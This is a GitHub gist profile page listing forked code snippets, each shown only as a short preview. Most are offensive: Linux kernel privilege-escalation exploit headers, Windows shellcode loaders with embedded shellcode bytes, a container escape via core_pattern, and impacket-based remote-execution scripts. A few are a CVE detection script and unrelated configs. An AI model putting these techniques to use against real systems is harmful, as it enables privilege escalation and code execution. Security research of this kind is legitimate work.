Skip to content

Instantly share code, notes, and snippets.

View emdnaia's full-sized avatar
👾

emdnaia

👾
60 followers · 395 following
View GitHub Profile
@emdnaia
emdnaia / gro_frag.c
Created May 22, 2026 15:41 — forked from lcfr-eth/gro_frag.c
LPE via GRO managed-frag UAF
/*
* gro_frag.c — LPE via GRO managed-frag UAF (io_uring SEND_ZC + veth)
*
* The bug: skb_gro_receive() copies frag descriptors from a ZC skb
* (SKBFL_MANAGED_FRAG_REFS → no per-frag page refs) into a non-ZC
* GRO accumulator. When the accumulator is freed, skb_release_data()
* calls put_page() on each frag — including the stolen ones that never
* had get_page() called. This gives us one extra put_page per merged
* ZC frag: a refcount underflow.
*
@emdnaia
emdnaia / sockmap_lpe_ktls.c
Created May 21, 2026 03:16 — forked from lcfr-eth/sockmap_lpe_ktls.c
slopped up
/*
* sockmap_lpe_ktls.c — full LPE via kTLS + sockmap page cache corruption
*
* https://lore.kernel.org/stable/20260517121626.406516-1-rollkingzzc@gmail.com/
*
* Works on ALL kernels 4.18+ (including 6.5+ where sendpage was removed).
*
* Chain: sendfile → tls_sw_sendmsg(MSG_SPLICE_PAGES)
* → tls_sw_sendmsg_splice → sk_msg_page_add(msg_pl, page)
* → bpf_exec_tx_verdict(msg_pl)
@emdnaia
emdnaia / olecheck.py
Created January 29, 2026 17:21 — forked from decalage2/olecheck.py
olecheck - a simple script to identify potential CVE-2026-21509 samples
# script to scan MS Office files, looking for "Shell.Explorer" OLE objects which could match CVE-2026-21509
# using oletools - https://github.com/decalage2/oletools
# Philippe Lagadec 2026-01-28
# NOTES:
# According to the MS advisory https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509
# the CVE-2026-21509 vulnerability is related to CLSID "EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B",
# corresponding to the "Shell.Explorer" COM object, which can be used to open the legacy
# Internet Explorer engine (aka Trident/MSHTML) from any application.
# So to exploit CVE2026-21509 from a MS Office document, one could use either an OLE object
@emdnaia
emdnaia / JasonToddIsTheBestRobin.c
Created September 25, 2025 17:25 — forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@emdnaia
emdnaia / enclave.c
Created August 3, 2025 22:56 — forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
@emdnaia
emdnaia / nginx-reverse-proxy-sing-box.conf
Created March 19, 2025 02:14 — forked from bitcoinvps/nginx-reverse-proxy-sing-box.conf
stream {
map $ssl_preread_server_name $singbox {
trojan.example.com trojan;
trojan-ws.example.com trojan-ws;
trojan-ws-6.example.com trojan-ws-6;
vmess.example.com vmess;
vmess-ws.example.com vmess-ws;
vmess-ws-6.example.com vmess-ws-6;
}
upstream trojan {
@emdnaia
emdnaia / lsarlookupsids3_aes.py
Created February 6, 2025 22:56 — forked from ThePirateWhoSmellsOfSunflowers/lsarlookupsids3_aes.py
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
from impacket.uuid import bin_to_uuidtup
from binascii import unhexlify
from random import randbytes
import sys
# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
# Pure TCP RPC is used (ncacn_ip_tcp option)
# AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848)
# Tested with impacket 0.12.0 on GOAD
@emdnaia
emdnaia / Dockerfile
Created December 16, 2024 04:05 — forked from HoKim98/Dockerfile
Multi-screen (Multi-GPU) XFCE Settings
# Copyright (c) 2023 Ho Kim (ho.kim@ulagbulag.io). All rights reserved.
# Configure environment variables
ARG ROCKYLINUX_VERSION="8"
# Be ready for serving
FROM "quay.io/rockylinux/rockylinux:${ROCKYLINUX_VERSION}" as base
# Install desktop environment dependencies
RUN dnf install -y \
@emdnaia
emdnaia / atexec_rpc.py
Created November 29, 2024 04:41 — forked from ThePirateWhoSmellsOfSunflowers/atexec_rpc.py
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
@emdnaia
emdnaia / core_pattern_escape.sh
Created October 26, 2024 19:19 — forked from magisterquis/core_pattern_escape.sh
Script to escape a container with /proc/sys/kernel/core_pattern reusing the existing shell's stdio
#!/bin/bash
#
# core_pattern_escape.sh
# Simple script to escape a container via /proc/sys/kernel/core_pattern
# By J. Stuart McMurray
# Created 20241026
# Last Modified 20241026
# Drop to /esc (or whatever name) in a container and...
#